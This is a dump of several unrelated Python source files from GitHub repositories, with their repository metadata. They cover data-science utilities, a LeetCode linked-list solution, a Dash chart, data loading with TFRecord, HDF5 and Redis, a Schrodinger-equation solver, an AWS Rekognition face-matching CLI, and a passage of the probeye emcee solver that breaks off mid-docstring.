val_ind in skf.split(table[column]):\n\n X_tr, X_val = table[[column, target]].iloc[tr_ind], table[[column, target]].iloc[val_ind]\n\n table[column].iloc[val_ind] = table[column].iloc[val_ind].map(X_tr.groupby(column)[target].mean())\n\n table[column] = table[column].fillna(table[target].mean())\n\n return table\n\n\ndef train_test_split(X, y, test_size=0.2):\n from sklearn.model_selection import train_test_split\n X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=test_size, random_state=42)\n return X_train, X_test, y_train, y_test\n\n\ndef log_transform(table, column, drop=True):\n table[f'log_{column}'] = pd.Series(np.log(1 + table[column]))\n if drop:\n table = table.drop(columns=[column])\n return table\n\n\ndef remove_duplicates(table):\n return table.drop_duplicates()\n\n\ndef compare_data_distributions(table1, table2):\n \"\"\"This is a two-sided test for the null hypothesis that 2 independent samples are drawn from the same\n continuous distribution. \"\"\"\n from scipy import stats\n pvalue = stats.ks_2samp(table1, table2)[1]\n if pvalue > .10:\n return True\n else:\n return False\n\n\n","repo_name":"MateuszLewandowski1/mateusz.h.lewandowski-gmail.com","sub_path":"utils_ds.py","file_name":"utils_ds.py","file_ext":"py","file_size_in_byte":18925,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"1110640887","text":"# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, val=0, next=None):\n# self.val = val\n# self.next = next\n\nclass Solution:\n def mergeKLists(self, lists: List[Optional[ListNode]]) -> Optional[ListNode]:\n if len(lists) == 0:\n return None\n\n if len(lists) > 1:\n temp = None\n for i in range(1,len(lists)):\n list1 = lists[0]\n list2 = lists[i]\n\n lists[0] = self.mergeList(list1, list2)\n \n return lists[0] \n\n def mergeList(self, list1: [ListNode], list2: [ListNode]) -> Optional[ListNode]:\n node = ListNode()\n tail = node\n\n while list1 and list2:\n if list1 and list2:\n if list1.val < list2.val:\n tail.next = list1\n list1 = list1.next\n\n else:\n tail.next = list2\n list2 = list2.next\n\n tail = tail.next\n \n if list1 or list2:\n tail.next = list1 if list1 else list2\n \n return node.next\n\n\n# class Solution:\n# def mergeKLists(self, lists: List[Optional[ListNode]]) -> Optional[ListNode]:\n# if not lists:\n# return None\n# if len(lists) == 1:\n# return lists[0]\n# mid = len(lists) // 2\n# l, r = self.mergeKLists(lists[:mid]), self.mergeKLists(lists[mid:])\n# return self.merge(l, r)\n \n# def merge(self, l, r):\n# dummy = p = ListNode()\n# while l and r:\n# if l.val < r.val:\n# p.next = l\n# l = l.next\n# else:\n# p.next = r\n# r = r.next\n# p = p.next\n# p.next = l or r\n# return dummy.next\n \n","repo_name":"tayyab-tariq/Leetcode","sub_path":"Merge k Sorted Lists.py","file_name":"Merge k Sorted Lists.py","file_ext":"py","file_size_in_byte":1839,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"34352783806","text":"\"\"\"\n Predicting on predictions (NN's can be stacked)\n\"\"\"\n\n\ndef w_sum(a, b):\n assert len(a) == len(b)\n output = 0\n for i in range(len(a)):\n output += (a[i] * b[i])\n return output\n\n# VECTOR MATRIX MULTIPLICATION\ndef vect_mat_mul(vect, matrix):\n # For each output we are performing a weighted sum of inputs\n # this function iterates through each row of weigths and makes\n # a prediction using w_sum\n assert len(vect) == len(matrix)\n\n output = [0, 0, 0]\n\n for i in range(len(vect)):\n output[i] = w_sum(vect, matrix[i])\n\n return output\n\n # toes wins fans\nih_wgt = [\n [0.1, 0.2, -0.1], # hid[0]\n [-0.1, 0.1, 0.9], # hid[1]\n [0.1, 1.4, 0.1] # hid[2]\n]\n\n # hid[0] hid[1] hid[2]\nhp_wgt = [\n [0.3, 1.1, -0.3], # hurt?\n [0.1, 0.2, 0.0], # win?\n [0.0, 1.3, 0.1] # sad?\n]\n\n\ndef neural_network(input, weights):\n hid = vect_mat_mul(input, weights[0])\n pred = vect_mat_mul(hid, weights[1])\n return pred\n\n\nweights = [ih_wgt, hp_wgt]\n\ntoes = [8.5, 9.5, 9.9, 9.0]\nwlrec = [0.64, 0.8, 0.8, 0.9]\nnfans = [1.2, 1.3, 0.5, 1.0]\n\ninput = [toes[0], wlrec[0], nfans[0]]\npredictions = neural_network(input, weights)\nprint(predictions)\n","repo_name":"charliecharlieO-o/grokking-nn-study","sub_path":"chapter3/ex5.py","file_name":"ex5.py","file_ext":"py","file_size_in_byte":1267,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"45336172237","text":"# -*- coding: utf-8 -*-\nimport dash\nimport dash_core_components as dcc\nimport dash_html_components as html\n\nimport pandas as pd\nimport plotly.graph_objs as go\n\nfrom dash.dependencies import Input, Output\n\n\n\nexternal_stylesheets = ['https://codepen.io/chriddyp/pen/bWLwgP.css']\n\napp = dash.Dash(__name__, external_stylesheets=external_stylesheets)\n\napp.layout = html.Div(children=[\n html.H1(children='Hello Dash'),\n\n html.Div(children='''\n Dash: A web application framework for Python.\n '''),\n\n dcc.Graph(\n id='example-graph' \n )\n])\n\ndef prepare_chart_bar_data():\n # In real world, below prob done something like...\n # df2018= pd.read_sql('mySQL',db)\n data2018 = [['January', 6], ['February', 7], ['March', 2]] \n data2019 = [['January', 7], ['February', 12], ['March', 5]] \n df2018 = pd.DataFrame(data2018, columns = ['Month', 'SnowDays']) \n df2019 = pd.DataFrame(data2019, columns = ['Month', 'SnowDays']) \n\n # Assemble our list data for graphic, we'll use the plotly graph object \"go\"\n \n bars_data_set_a = {'data':\n [\n {'x': df2018['Month'].tolist(),\n 'y': df2018['SnowDays'].tolist(),\n 'type':'bar',\n 'name':'2018'}\n ]\n }\n\n bars_data_set_b = {'data':\n [\n {'x': df2019['Month'].tolist(),\n 'y': df2019['SnowDays'].tolist(),\n 'type':'bar',\n 'name':'2019'}\n ],\n 'layout': {'title':'visualization'}}\n\n #my_figure_dict = dict(bars_data_set_a, **bars_data_set_b)\n bars_data_set_a.update(bars_data_set_b)\n\n my_figure_dict = bars_data_set_a\n\n return my_figure_dict\n\n\n@app.callback(\n Output('example-graph', 'figure'),\n [Input('example-graph', '')])\ndef update_figure(figure):\n return prepare_chart_bar_data()\n\nif __name__ == '__main__':\n app.run_server(debug=True)\n\n \n # data': [\n # {'x': [1, 2, 3], 'y': [4, 1, 2], 'type': 'bar', 'name': 'SF'},\n # {'x': [1, 2, 3], 'y': [2, 4, 5], 'type': 'bar', 'name': u'Montréal'},\n # ],\n # 'layout': {\n # 'title': 'Dash Data Visualization'\n\n \n \n # return {\n # 'data': [\n # {'x': df2018['Month'], 'y': df2018['SnowDays'], 'type': 'bar', 'name': '2018'},\n # {'x': df2019['Month'], 'y': df2019['SnowDays'], 'type': 'bar', 'name': '2019'},\n # ],\n # 'layout': {\n # 'title': 'Dash Data Visualization'\n # }\n # }\n\n \n\n\n \n\n","repo_name":"maxrottersman/MaxDashProject","sub_path":"Archived_Experiments/alt_dash_example_01_function_first_3_addmoredataabsraction.py","file_name":"alt_dash_example_01_function_first_3_addmoredataabsraction.py","file_ext":"py","file_size_in_byte":2511,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"70635768533","text":"import os\nimport numpy as np\nfrom rich.progress import track\nimport pandas as pd\nfrom visualizers.DataVisualizers import visualize_line\n\ndef run(name, points, runners, generator, tests_per_point=10, ret_data=lambda x, y, z: x,\n data_names=[], x_name=\"X\", output=None, **kwargs):\n res = []\n\n for point in track(np.arange(*points)):\n for i in range(tests_per_point):\n test = generator(point)\n for name, runner in runners.items():\n result = runner(test, **kwargs)\n fix_res = point, *ret_data(result, test, name), name\n\n res.append(fix_res)\n\n\n\n np_arr = np.array(res)\n dataset = pd.DataFrame(np_arr, columns=[x_name, *data_names, \"Runner\"])\n\n for i in data_names: \n visualize_line(f\"{name}: {i}\", x_name, i, dataset, output=output, hue=\"Runner\")\n\n","repo_name":"atrin-hojjat/Uni-AI-Course-Reports","sub_path":"Report 03/code/tests/TestRunner.py","file_name":"TestRunner.py","file_ext":"py","file_size_in_byte":846,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"11611158114","text":"# 1. opencv >>>> PIL\n#\n# IO cost\n# 1. hdf5, tfrecord (Tensorflow) several small image (text) to a larger file\n# 2. preloader\n# 3. cache (lmdb or redis) key, value cahe\n#\n# pin_memory = True\n\n# tfrecord\nimport tensorflow as tf\nimport os\nfrom PIL import Image\nimport numpy as np\n\ndef _bytes_feature(value):\n \"\"\"Returns a bytes_list from a string / byte.\"\"\"\n return tf.train.Feature(bytes_list=tf.train.BytesList(value=[tf.io.encode_jpeg(value).numpy()]))\n\ndef _int64_feature(value):\n \"\"\"Returns an int64_list from a bool / enum / int / uint.\"\"\"\n return tf.train.Feature(int64_list=tf.train.Int64List(value=[value]))\n\ndef image_example(image_path, label):\n image_raw = Image.open(image_path)\n image_raw = np.array(image_raw)\n\n feature = {\n 'image': _bytes_feature(image_raw.tobytes()),\n 'label': _int64_feature(label),\n }\n\n return tf.train.Example(features=tf.train.Features(feature=feature))\n\ndef create_tfrecord(output_filename, image_folder):\n writer = tf.io.TFRecordWriter(output_filename)\n\n # Your dataset: list of tuples (image_path, label)\n dataset = [\n (\"path/to/image1.jpg\", 0),\n (\"path/to/image2.jpg\", 1),\n # Add more images and labels as needed\n ]\n\n for image_path, label in dataset:\n tf_example = image_example(image_path, label)\n writer.write(tf_example.SerializeToString())\n\n writer.close()\n\n# Specify the output TFRecord file and the folder containing images\ntfrecord_filename = 'output.tfrecord'\nimage_folder_path = 'path/to/your/image/folder'\n\n# Create TFRecord file\ncreate_tfrecord(tfrecord_filename, image_folder_path)\n\n# several small images to hdf5 file\nimport torch\nfrom torch.utils.data import Dataset, DataLoader\nfrom torchvision import transforms\nimport h5py\nfrom PIL import Image\nimport os\nfrom multiprocessing import Pool\n\nclass CustomDataset(Dataset):\n def __init__(self, root_dir):\n self.root_dir = root_dir\n self.image_paths = [os.path.join(root_dir, file) for file in os.listdir(root_dir) if file.endswith(\".jpg\")]\n self.transform = transforms.Compose([transforms.ToTensor()])\n\n def __len__(self):\n return len(self.image_paths)\n\n def __getitem__(self, idx):\n image_path = self.image_paths[idx]\n image = Image.open(image_path).convert('RGB')\n image = self.transform(image)\n return image\n\ndef process_images(args):\n idx, image_path = args\n image = Image.open(image_path).convert('RGB')\n image = transforms.ToTensor()(image)\n return idx, image.numpy()\n\ndef convert_to_hdf5_multiprocess(dataset, output_filename='output.h5', num_processes=4):\n with h5py.File(output_filename, 'w') as hdf5_file:\n images_group = hdf5_file.create_group('images')\n\n # Use multiprocessing to parallelize image processing\n with Pool(num_processes) as pool:\n results = pool.map(process_images, enumerate(dataset.image_paths))\n\n for idx, image_data in results:\n images_group.create_dataset(f'image_{idx}', data=image_data)\n\n# Specify the folder containing images\nimage_folder_path = 'path/to/your/image/folder'\n\n# Create a dataset\ndataset = CustomDataset(image_folder_path)\n\n# Convert to HDF5 using multiple processes\nhdf5_filename = 'output.h5'\nconvert_to_hdf5_multiprocess(dataset, hdf5_filename, num_processes=4)\n\n# redis \nimport redis\nfrom PIL import Image\nfrom io import BytesIO\nimport base64\n\n# Connect to the Redis server\nredis_client = redis.StrictRedis(host='localhost', port=6379, decode_responses=True)\n\ndef encode_image(image_path):\n with open(image_path, \"rb\") as image_file:\n encoded_image = base64.b64encode(image_file.read()).decode('utf-8')\n return encoded_image\n\ndef decode_image(encoded_image):\n decoded_image = base64.b64decode(encoded_image)\n return Image.open(BytesIO(decoded_image))\n\ndef store_images_in_redis(image_folder):\n # Assuming each image has a unique filename\n image_files = [f for f in os.listdir(image_folder) if f.endswith('.jpg')]\n\n for image_file in image_files:\n image_path = os.path.join(image_folder, image_file)\n encoded_image = encode_image(image_path)\n key = f\"image:{image_file}\"\n redis_client.set(key, encoded_image)\n\ndef retrieve_image_from_redis(image_key, output_path):\n encoded_image = redis_client.get(image_key)\n if encoded_image:\n decoded_image = decode_image(encoded_image)\n decoded_image.save(output_path)\n\n# Specify the folder containing images\nimage_folder_path = 'path/to/your/image/folder'\n\n# Store images in Redis\nstore_images_in_redis(image_folder_path)\n\n# Retrieve an image from Redis (replace 'your_image_key' with an actual key)\nimage_key = 'image:your_image.jpg'\noutput_image_path = 'output_image.jpg'\nretrieve_image_from_redis(image_key, output_image_path)\n\n\n","repo_name":"ChenXie-sci/model_optimization","sub_path":"data_loader.py","file_name":"data_loader.py","file_ext":"py","file_size_in_byte":4826,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"17229798699","text":"import pathlib\nfrom .gen_utils import *\nfrom dk2cxx import *\n\n\ndef format_functions_cpp(globals: list[dk2map.Global], blocks: UserBlocks = None):\n def format_cpp_head():\n yield format_middle(f\"warning: file is managed by {pathlib.Path(__file__).name}\")\n yield format_middle(f\"you can edit code only in *_user_code blocks\")\n yield f\"#include \"\n yield empty_line\n yield f\"using namespace dk2;\"\n yield empty_line\n yield f\"#define relink_stub(name) printf(\\\"[fatal]: stub \\\"#name\\\" call\\\\n\\\"); ::abort();\"\n yield empty_line\n yield from map(format_autogen_line, format_cpp_head())\n yield format_block_line(\"head_user_code\")\n if blocks is not None:\n yield from blocks.head\n else:\n yield f\"\"\n yield f\"// user code\"\n yield f\"\"\n yield format_end_of_block_line()\n\n def format_cpp_body():\n yield f\"#pragma optimize( \\\"\\\", off )\"\n for glob in filter(filter_function_var, globals):\n fun_t = glob.type # type: dk2map.FunctionType\n suffix = \" // assembly\" if fun_t.declspec is dk2map.Declspec.Assembly else ''\n # ret = ''\n # if fun_t.ret.kind is dk2map.TypeKind.Ptr:\n # ret = ' return NULL; '\n # elif fun_t.ret.kind is dk2map.TypeKind.Bool:\n # ret = ' return false; '\n # elif fun_t.ret.kind in [\n # dk2map.TypeKind.Int, dk2map.TypeKind.Float,\n # dk2map.TypeKind.Char, dk2map.TypeKind.Winapi\n # ]:\n # ret = ' return 0; '\n name = f\"dk2::{format_function_name(glob.name)}\"\n ret = f\" relink_stub({name}); \"\n yield f\"/*{glob.va:08X}*/ {format_function(fun_t, name)} {{{ret}}}{suffix}\"\n yield empty_line\n yield f\"#pragma optimize( \\\"\\\", on )\"\n yield from map(format_autogen_line, format_cpp_body())\n yield format_block_line(\"tail_user_code\")\n if blocks is not None:\n yield from blocks.tail\n else:\n yield f\"\"\n yield f\"// user code\"\n yield f\"\"\n yield format_end_of_block_line()\n\n","repo_name":"DiaLight/Ember","sub_path":"dk2/gen/gen_functions_cpp.py","file_name":"gen_functions_cpp.py","file_ext":"py","file_size_in_byte":1932,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"67"} +{"seq_id":"25164537359","text":"from flask import Flask, request, abort\nfrom flask_restful import Resource, Api\nfrom marshmallow import Schema, fields\n\n\nclass BarQuerySchema(Schema):\n key1 = fields.Str(required=True)\n key2 = fields.Str(required=True)\n kucundayu = fields.Int()\n\n\napp = Flask(__name__)\napi = Api(app)\nschema = BarQuerySchema()\n\n\nclass BarAPI(Resource):\n def get(self):\n print(request.args)\n errors = schema.validate(request.args)\n if errors:\n abort(400, str(errors))\n msg = \"OK\"\n #print(request.args['key1'])\n msg += request.args['key1'] + \", \"\n #print(request.args['key1'])\n msg += request.args['key2'] + \", \"\n\n if 'kucundayu' in request.args:\n print(request.args['kucundayu'])\n msg += request.args['kucundayu'] + \", \"\n return msg\n\napi.add_resource(BarAPI, '/bar', endpoint='bar')\n\n# omit of you intend to use `flask run` command\nif __name__ == '__main__':\n app.run(debug=True)","repo_name":"CeciliaRuiSun/Asset-Management-Web-App","sub_path":"guide/test2.py","file_name":"test2.py","file_ext":"py","file_size_in_byte":979,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"2179910509","text":"'''Written by Yinshi Liu'''\nimport numpy as np\nimport scipy as sp\nimport matplotlib.pyplot as plt\n#define constants\nL = 1*10**(-8)\nm = 9.109*10**(-31)\nsigma = L/25\nkappa = 500/L\nx_0 = L/5\nP = 1024\ndt = 1*10**(-18)\nN = 3000\nh_bar = 1.05*10**(-34)\n\np = np.arange(1, P)\na = L/P\nx = p*a - L/2\npsi = np.zeros(P-1, dtype = \"complex_\")\n\n#normalization constant\npsi_0 = 1/((2*np.pi*sigma**2)**(1/4))\n#initial psi \nfor i in range(1, P-1):\n psi[i] = psi_0 * np.exp(-(x[i]-x_0)**2/(4*sigma**2) + 1j*kappa*x[i])\nprint(psi)\nplt.figure(figsize = (6,4))\nplt.plot(x, psi)\nplt.xlabel('x(m)')\nplt.ylabel('real ψ')\nplt.title('wavefunction ψ at T = 0')\nplt.tight_layout()\nplt.savefig('Fig 1.1.png')\n#define the Hamiltonian\nA = -h_bar**2/(2*m*a**2)\n#V(x) = 0 in potential well\nB = -2*A\nvec_diag = B*np.ones(P-1)\nD = np.diag(vec_diag, k=0)\nsup = A*np.eye(P-1, k = 1)\nsub = A*np.eye(P-1, k = -1)\nH = D + sup + sub\n\n#define time independent matrix L, R\nLeft = np.eye(P-1) + (dt/(2*h_bar))*1j*H\nRight = np.eye(P-1) - (dt/(2*h_bar))*1j*H\n\n#define position and time arrays\ntime = []\nx_exp = []\nprob = []\npsi_total = []\nprob = []\npos = []\nenergy = []\n#begin time steps\ni = 0\nwhile i < 3000:\n #calculate psi(n+1)\n v = np.matmul(Right, psi)\n psi_new = np.linalg.solve(Left, v)\n psi = np.copy(psi_new)\n psi_total.append(psi_new)\n if i == 750:\n plt.figure(figsize = (6,4))\n plt.plot(x, psi)\n plt.xlabel('x(m)')\n plt.ylabel('real ψ')\n plt.title('wavefunction ψ at T = T/4')\n plt.tight_layout()\n plt.savefig('Fig 1.2.png')\n if i == 1500:\n plt.figure(figsize = (6,4))\n plt.plot(x, psi)\n plt.xlabel('x(m)')\n plt.ylabel('real ψ')\n plt.title('wavefunction ψ at T = T/2')\n plt.tight_layout()\n plt.savefig('Fig 1.3.png')\n if i == 2250:\n plt.figure(figsize = (6,4))\n plt.plot(x, psi)\n plt.xlabel('x(m)')\n plt.ylabel('real ψ')\n plt.title('wavefunction ψ at T = 3T/4')\n plt.tight_layout()\n plt.savefig('Fig 1.4.png')\n time.append(i*dt)\n i += 1\nplt.figure(figsize = (6,4))\nplt.plot(x, psi)\nplt.xlabel('x(m)')\nplt.ylabel('real ψ')\nplt.title('wavefunction ψ at T = T')\nplt.tight_layout()\nplt.savefig('Fig 1.5.png')\n\n#verify normalization\n#integrate psi*conj(psi) using trap. rule\nfor i in range(len(psi_total)):\n psi_t = psi_total[i]\n psi_magnitude = psi_t*np.conj(psi_t)\n prob.append(np.sum(psi_magnitude)*a)\n#calculate expected value of x\nfor i in range(len(psi_total)):\n psi_t = psi_total[i]\n position = x*psi_t*np.conj(psi_t)\n pos.append(np.sum(position)*a)\n#calculate total energy\nfor i in range(len(psi_total)):\n psi_t = psi_total[i]\n psi_magnitude = psi_t*np.conj(psi_t)\n E = np.matmul(H, psi_magnitude)\n energy.append(np.sum(E*a))\nplt.figure()\nplt.plot(time, prob)\nplt.ylim(0.9, 1.1)\nplt.xlabel('time(s)')\nplt.ylabel('Total Probability')\nplt.title('Normalization of ψ over time')\nplt.savefig('Fig 1.7.png')\n\nplt.figure()\nplt.plot(time, pos)\nplt.xlabel('time(s)')\nplt.ylabel('Expected position')\nplt.title('Expected position over time')\nplt.savefig('Fig 1.6.png')\n\nplt.figure()\nplt.plot(time, energy)\nplt.xlabel('time(s)')\nplt.ylabel('Energy (J)')\nplt.title('Energy conservation over time')\nplt.savefig('Fig 1.8.png')\n","repo_name":"Lenventor/Computation-physics-PHY407","sub_path":"Lab09_TIme-dependent Schrodinger equation (Crank-Nicolson Method).py","file_name":"Lab09_TIme-dependent Schrodinger equation (Crank-Nicolson Method).py","file_ext":"py","file_size_in_byte":3300,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"13000620983","text":"import click\nimport botocore, botocore.session\nfrom botocore.exceptions import ClientError\nimport time\nimport cv2\nimport sys\nimport errno\nfrom os import listdir\nfrom os.path import isfile, join\n\nFILE_NAME = 'selfie.png'\n\ndef capture_frame():\n ### Capture image from cam\n camera = cv2.VideoCapture(0)\n time.sleep(0.2) # If you don't wait, the image will be dark\n\n if camera.isOpened(): # try to get the first frame\n rval, frame = camera.read()\n else:\n rval = False\n exit -1\n\n cv2.imwrite(FILE_NAME, frame)\n del(camera) # so that others can use the camera as soon as possible\n\ndef add_face(ctx, file, collection, name):\n session = botocore.session.Session(profile=ctx.obj['PROFILE'])\n\n ### Send to Rekognition to add it to faces collection\n rekognition = session.create_client('rekognition')\n dynamodb = session.create_client('dynamodb')\n\n ### Read image from file system\n with open(file, 'rb') as image:\n response = rekognition.index_faces(\n CollectionId=collection,\n Image={\n 'Bytes': image.read()\n }\n )\n\n ### If successful, add info in DDB\n if len(response['FaceRecords']) > 0:\n ddb_response = dynamodb.put_item(\n TableName=collection,\n Item={\n 'face-id': {\n 'S': response['FaceRecords'][0]['Face']['FaceId'],\n },\n 'name': {\n 'S': name,\n }\n }\n )\n click.secho(\"All done. {} has been successfully added.\".format(name), fg='blue')\n else:\n click.secho(\"Sorry, something went wrong while adding {}. Try again or see an admin for help.\".format(name), fg='yellow')\n\n@click.group()\n@click.option('--profile', metavar='AWS_PROFILE', default='default', envvar='AWS_DEFAULT_PROFILE',\n help='The name of the AWS profile to use. You can configure a profile with the AWS CLI command: aws configure --profile .')\n@click.pass_context\ndef cli(ctx, profile):\n \"\"\"TBD\"\"\"\n ctx.obj = {}\n ctx.obj['PROFILE'] = profile\n\n@cli.command()\n@click.option('--collection', prompt='Please enter the collection name', help='Name of the collection to add the faces to')\n@click.option('--path', prompt='Please enter the path to the images', help='Path to a directory containing the faces images')\n@click.pass_context\ndef setup(ctx, collection, path):\n \"\"\"Sets up a collection with faces (pictures) from the local filesystem.\"\"\"\n session = botocore.session.Session(profile=ctx.obj['PROFILE'])\n\n rekognition = session.create_client('rekognition')\n dynamodb = session.create_client('dynamodb')\n\n ### Creates DDB table\n try:\n response = dynamodb.create_table(\n AttributeDefinitions=[\n {\n 'AttributeName': 'face-id',\n 'AttributeType': 'S',\n }\n ],\n KeySchema=[\n {\n 'AttributeName': 'face-id',\n 'KeyType': 'HASH',\n }\n ],\n ProvisionedThroughput={\n 'ReadCapacityUnits': 5,\n 'WriteCapacityUnits': 5,\n },\n TableName=collection\n )\n\n click.secho(\"DynamoDB table {} created.\".format(collection), fg='blue')\n except ClientError as e:\n click.secho(\"Sorry, something went wrong: {}. Try again or see an admin for help.\".format(e), fg='yellow')\n\n ### Creates Rekognition collection\n response = rekognition.create_collection(\n CollectionId=collection\n )\n\n if response['StatusCode'] == 200:\n click.secho(\"Collection {} created.\".format(collection), fg='blue')\n else:\n click.secho(\"Sorry, something went wrong. Try again or see an admin for help.\", fg='yellow')\n\n ### Adds faces to collection and info to DDB\n faces = [f for f in listdir(path) if isfile(join(path, f))]\n for face in faces:\n click.secho(\"Working on {}\".format(face), fg='blue')\n try:\n add_face(ctx, join(path, face), collection, face.split('.')[0])\n except IOError as exc:\n if exc.errno != errno.EISDIR: # Do not fail if a directory is found, just ignore it.\n raise # Propagate other kinds of IOError.\n\n@cli.command()\n@click.option('--name', nargs=2, prompt='Please enter the full name', help='Full name of the person being added')\n@click.option('--collection', prompt='Please enter the collection name', help='Name of the collection to add the face to')\n@click.pass_context\ndef add(ctx, name, collection):\n \"\"\"Captures an image from the camera and adds it to the collection.\"\"\"\n ### Capture image from cam\n capture_frame()\n\n ### Send to Rekognition to add it to faces collection\n add_face(ctx, FILE_NAME, collection, name)\n\n\n@cli.command()\n@click.option('--collection', prompt='Please enter the collection name', help='Name of the collection to compare the face to')\n@click.pass_context\ndef capture(ctx, collection):\n \"\"\"Captures an image from the camera and compares it to the faces in the collection.\"\"\"\n session = botocore.session.Session(profile=ctx.obj['PROFILE'])\n ### Capture image from cam\n capture_frame()\n\n ### Send to Rekognition to compare it to faces in collection\n rekognition = session.create_client('rekognition')\n dynamodb = session.create_client('dynamodb')\n\n with open(\"selfie.png\", 'rb') as image:\n response = rekognition.search_faces_by_image(\n CollectionId=collection,\n Image={\n 'Bytes': image.read()\n },\n MaxFaces=1,\n FaceMatchThreshold=80\n )\n\n ### If a match is found, get info from DDB\n if len(response['FaceMatches']) == 1:\n ddb_response = dynamodb.get_item(\n TableName=collection,\n Key={\n 'face-id': {\n 'S': response['FaceMatches'][0]['Face']['FaceId'],\n }\n }\n )\n click.secho(\"Welcome {}! You can now proceed.\".format(ddb_response['Item']['name']['S']), fg='green')\n else:\n click.secho(\"Sorry, we couldn't recognize you. Try again or see an admin for help.\", fg='yellow')\n","repo_name":"dstroppa/facer","sub_path":"facer.py","file_name":"facer.py","file_ext":"py","file_size_in_byte":6276,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"35803075785","text":"# standard library imports\nfrom typing import TYPE_CHECKING, Optional\nimport time\nimport random\nimport contextlib\n\n# third party imports\nimport numpy as np\nimport emcee\nimport arviz as az\nfrom loguru import logger\nfrom tabulate import tabulate\n\n# local imports\nfrom probeye.subroutines import pretty_time_delta\nfrom probeye.subroutines import check_for_uninformative_priors\nfrom probeye.inference.scipy.solver import ScipySolver\nfrom probeye.subroutines import stream_to_logger\nfrom probeye.subroutines import print_dict_in_rows\nfrom probeye.subroutines import extract_true_values\n\n# imports only needed for type hints\nif TYPE_CHECKING: # pragma: no cover\n from probeye.definition.inverse_problem import InverseProblem\n\n\nclass EmceeSolver(ScipySolver):\n \"\"\"\n Provides emcee-sampler which is a pure-Python implementation of Goodman & Weare’s\n Affine Invariant Markov chain Monte Carlo (MCMC) Ensemble sampler. For more\n information, check out https://emcee.readthedocs.io/en/stable/.\n\n Parameters\n ----------\n problem\n Describes the inverse problem including e.g. parameters and data.\n seed\n Random state used for random number generation.\n show_progress\n When True, the progress of a solver routine will be shown (for example as a\n progress-bar) if such a feature is available. Otherwise, the progress will\n not shown.\n \"\"\"\n\n def __init__(\n self,\n problem: \"InverseProblem\",\n seed: Optional[int] = None,\n show_progress: bool = True,\n ):\n logger.debug(f\"Initializing {self.__class__.__name__}\")\n # check that the problem does not contain a uninformative prior\n check_for_uninformative_priors(problem)\n # initialize the scipy-based solver (ScipySolver)\n super().__init__(problem, seed=seed, show_progress=show_progress)\n\n def emcee_summary(\n self, posterior_samples: np.ndarray, true_values: Optional[dict] = None\n ) -> dict:\n \"\"\"\n Computes and prints a summary of the posterior samples containing mean, median,\n standard deviation, 5th percentile and 95th percentile. Note, that this method\n was based on code from the taralli package: https://gitlab.com/tno-bim/taralli.\n\n Parameters\n ----------\n posterior_samples\n The generated samples in an array with as many columns as there are latent\n parameters, and n rows, where n = n_chains * n_steps.\n true_values\n True parameter values, if known.\n\n Returns\n -------\n Keys are the different statistics 'mean', 'median', 'sd' (standard\n deviation), 'q05' and 'q95' (0.05- and 0.95-quantile). The values are\n dictionaries with the parameter names as keys and the respective statistics\n as values.\n \"\"\"\n\n # used for the names in the first column\n var_names = self.problem.get_theta_names(tex=False, components=True)\n\n # compute some stats for each column (i.e., each parameter)\n mean = np.mean(posterior_samples, axis=0)\n quantiles = np.quantile(posterior_samples, [0.50, 0.05, 0.95], axis=0)\n median = quantiles[0, :]\n quantile_05 = quantiles[1, :]\n quantile_95 = quantiles[2, :]\n\n # compute the sample standard deviations for each parameter\n cov_matrix = np.atleast_2d(np.cov(posterior_samples.T))\n sd = np.sqrt(np.diag(cov_matrix))\n\n # assemble the summary array\n if true_values:\n col_names = [\"\", \"true\", \"mean\", \"median\", \"sd\", \"5%\", \"95%\"]\n true = extract_true_values(true_values, var_names)\n row_names = np.array(var_names)\n tab = np.hstack(\n (\n row_names.reshape(-1, 1),\n true.reshape(-1, 1),\n mean.reshape(-1, 1),\n median.reshape(-1, 1),\n sd.reshape(-1, 1),\n quantile_05.reshape(-1, 1),\n quantile_95.reshape(-1, 1),\n )\n )\n\n # print the generated table, and return a summary dict for later use\n print(tabulate(tab, headers=col_names, floatfmt=\".2f\"))\n return {\n \"true\": {name: val for name, val in zip(row_names, true)},\n \"mean\": {name: val for name, val in zip(row_names, mean)},\n \"median\": {name: val for name, val in zip(row_names, median)},\n \"sd\": {name: val for name, val in zip(row_names, sd)},\n \"q05\": {name: val for name, val in zip(row_names, quantile_05)},\n \"q95\": {name: val for name, val in zip(row_names, quantile_95)},\n }\n else:\n col_names = [\"\", \"mean\", \"median\", \"sd\", \"5%\", \"95%\"]\n row_names = np.array(var_names)\n tab = np.hstack(\n (\n row_names.reshape(-1, 1),\n mean.reshape(-1, 1),\n median.reshape(-1, 1),\n sd.reshape(-1, 1),\n quantile_05.reshape(-1, 1),\n quantile_95.reshape(-1, 1),\n )\n )\n\n # print the generated table, and return a summary dict for later use\n print(tabulate(tab, headers=col_names, floatfmt=\".2f\"))\n return {\n \"mean\": {name: val for name, val in zip(row_names, mean)},\n \"median\": {name: val for name, val in zip(row_names, median)},\n \"sd\": {name: val for name, val in zip(row_names, sd)},\n \"q05\": {name: val for name, val in zip(row_names, quantile_05)},\n \"q95\": {name: val for name, val in zip(row_names, quantile_95)},\n }\n\n def run(\n self,\n n_walkers: int = 20,\n n_steps: int = 1000,\n n_initial_steps: int = 100,\n true_values: Optional[dict] = None,\n **kwargs,\n ) -> az.data.inference_data.InferenceData:\n \"\"\"\n Runs the emcee-sampler for the InverseProblem the EmceeSolver was initialized\n with and returns the results as an arviz InferenceData obj.\n\n Parameters\n ----------\n n_walkers\n Number of walkers used by the estimator.\n n_steps\n Number of steps to run.\n 